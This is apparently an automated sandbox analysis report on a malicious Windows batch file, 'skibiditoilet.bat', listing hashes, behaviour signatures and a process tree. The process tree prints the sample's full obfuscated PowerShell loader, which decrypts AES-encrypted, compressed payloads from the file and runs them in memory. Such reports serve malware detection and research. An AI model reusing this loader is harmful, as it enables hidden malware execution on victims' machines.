Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 20:57
Static task
static1
Behavioral task
behavioral1
Sample
skibiditoilet.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
skibiditoilet.bat
-
Size
387KB
-
MD5
6ec5500db5d8212dcc568b18625ec02d
-
SHA1
ff54436163b39f0b5fbee0ca7979baa17575b11b
-
SHA256
c605d818ed30ce011d0116ba907cda2395086d28ef59c5ffd9cdd88b70da9586
-
SHA512
0357463151a2e0e383a69a979276f4d88f62a23c40bbaccad5f81e99b7d93f41fb0b99802f46bec907795e211bbd1f941564708b78be269282e0cfa475336551
-
SSDEEP
6144:GhtfNR4FRR7UoSJGUtNQN0+XLTVWJ9pCI5LhLZijlLoppEkyeiUolokyX288+8L2:GhHR2i1zQN/BWLpq2pE+gJU2c8TW
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2652 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2684 2736 cmd.exe 31 PID 2736 wrote to memory of 2684 2736 cmd.exe 31 PID 2736 wrote to memory of 2684 2736 cmd.exe 31 PID 2736 wrote to memory of 2652 2736 cmd.exe 32 PID 2736 wrote to memory of 2652 2736 cmd.exe 32 PID 2736 wrote to memory of 2652 2736 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lkb2a6wq+wdGI8KXoIWU0J4MWA7cE3mdjhriSvO0Ok0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O0KT7arsvuClDc3Kj4sQ5Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xgzet=New-Object System.IO.MemoryStream(,$param_var); $QHMEA=New-Object System.IO.MemoryStream; $IgjAN=New-Object System.IO.Compression.GZipStream($xgzet, [IO.Compression.CompressionMode]::Decompress); $IgjAN.CopyTo($QHMEA); $IgjAN.Dispose(); $xgzet.Dispose(); $QHMEA.Dispose(); $QHMEA.ToArray();}function execute_function($param_var,$param2_var){ $KRqFn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jredd=$KRqFn.EntryPoint; $jredd.Invoke($null, $param2_var);}$iqLQK = 'C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat';$host.UI.RawUI.WindowTitle = $iqLQK;$tTsNQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iqLQK).Split([Environment]::NewLine);foreach ($cKIUl in $tTsNQ) { if ($cKIUl.StartsWith('UKUaOQBKFFteykhAscvJ')) { $WoETV=$cKIUl.Substring(20); break; }}$payloads_var=[string[]]$WoETV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-